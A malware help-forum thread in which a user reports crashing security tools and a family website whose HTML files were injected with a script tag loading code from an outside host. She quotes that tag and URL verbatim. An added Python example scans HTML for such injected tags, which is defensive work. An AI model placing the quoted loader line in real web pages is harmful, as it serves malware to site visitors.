Not sure what malware I have, but none of the fixes work


jevans

Hi,

I've tried many of the suggestions in your forums and have yet to find a solution that works. Anti-Malware crashes a few seconds after I open it, but none of the fixes posted will work.

- I tried renaming the .exe to .com and also renaming wbam.exe to winlogon.exe, but it still crashes in both instances.

- I also uninstalled Anti-Malware and downloaded procexp.exe, renaming it to winlogon.exe and running it. I didn't find any instances of files with shields next to them.

- I've run RootRepeal and have gotten different results each time I've run it. (It always finds c:/hiberfil.sys, and sometimes finds other files in c:/docs & settings/justine/local settings/temp, but none of them are .sys files or have prefixes matching those in the "CLB Driver list". I've attached a screen shot of the latest results in case it helps.)

- Avira AntiVir Personal crashes during the installation.

- HijackThis won't install either.

- I've run Process Explorer, but haven't seen any of the files with shields next to them or av360.exe. (Screen shot attached, just in case.)

Can anyone offer any other suggestions to try?

Thanks,

Justine

root_repeal_screen_shot.bmp

process_explorer_screen_shot.bmp

While I wait for a response, I thought providing more info. might help a bit.

I manage a small website for my sister (www.itsinthebagscrapbooking.com), which was flagged by Google about a week ago as having malware on it. After looking at the uploaded files, I found a script inserted into all the HTML files between the head and body tags (<script src=http://starktourism.com/flash/mt_global.php ></script>). We contacted the hosting company, who told us it came through an exploit on one of our computers through an older version of Flash or Adobe Reader. I updated those programs, re-uploaded clean versions of all files to the website, and got us unblocked by Google.

Since then, a script is back on the site, although I can no longer access it or get FTP access to check the files.

I have updated everything I can think of...Windows Svc Pack 3, IE 8, Firefox 3.5.5, Adobe Reader 9.0...and have even removed all versions of Java and reinstalled with the latest.

I've also tried one virus removal tool after the next, including trying to install one from Sophos which seemed to match what I have. (See http://news.softpedia.com/news/New-Mass-We...-125278.shtml.) The malware must be blocking me from downloading it though, because I get a page not found error when I click the link to download the software. (I get the same error when I try to go to symantec.com too.) And if you read my previous post, you'll see the other programs I've tried.

Hope this helps clarify things,

Justine
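
The injection described in the post above (a script tag placed between the head and body tags of every HTML file) can be checked for in a local copy of a site before it is re-uploaded. This is an added example, not part of the original thread; the host names and sample HTML are constructed, and `find_suspect_scripts` and `scan_tree` are hypothetical helper names.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Matches <script ... src=...> with a quoted or unquoted src value.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE)
HEAD_CLOSE = re.compile(r"</head\s*>", re.IGNORECASE)
BODY_OPEN = re.compile(r"<body\b", re.IGNORECASE)

# Constructed sample page (assumed site host: www.example.org).
SAMPLE = """<html><head><title>Shop</title>
<script src="js/menu.js"></script>
<script src="http://stats.example.net/t.js"></script>
</head>
<script src=http://injected.example/flash/x.php ></script>
<body><p>Hello</p></body></html>"""

def find_suspect_scripts(html, site_hosts):
    """Return (src, reason) for each script tag that sits between </head>
    and <body>, or that loads from a host not listed in site_hosts."""
    head_end = HEAD_CLOSE.search(html)
    body_start = BODY_OPEN.search(html)
    gap = None
    if head_end and body_start and head_end.end() <= body_start.start():
        gap = (head_end.end(), body_start.start())
    findings = []
    for m in SCRIPT_SRC.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        host = (urlparse(src).hostname or "").lower()  # "" for relative paths
        if gap and gap[0] <= m.start() < gap[1]:
            findings.append((src, "between </head> and <body>"))
        elif host and host not in site_hosts:
            findings.append((src, "off-site host"))
    return findings

def scan_tree(root, site_hosts):
    """Scan every .htm/.html file under root; return {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.htm*"):
        if path.is_file():
            hits = find_suspect_scripts(path.read_text(errors="replace"), site_hosts)
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    print(find_suspect_scripts(SAMPLE, {"www.example.org"}))
```

An off-site finding is not proof of compromise (legitimate analytics or CDN scripts will appear too); it is a list to compare against what the site owner knowingly included.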

  • 4 weeks later...
  • 2 weeks later...
  • Staff

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

This topic is now closed to further replies.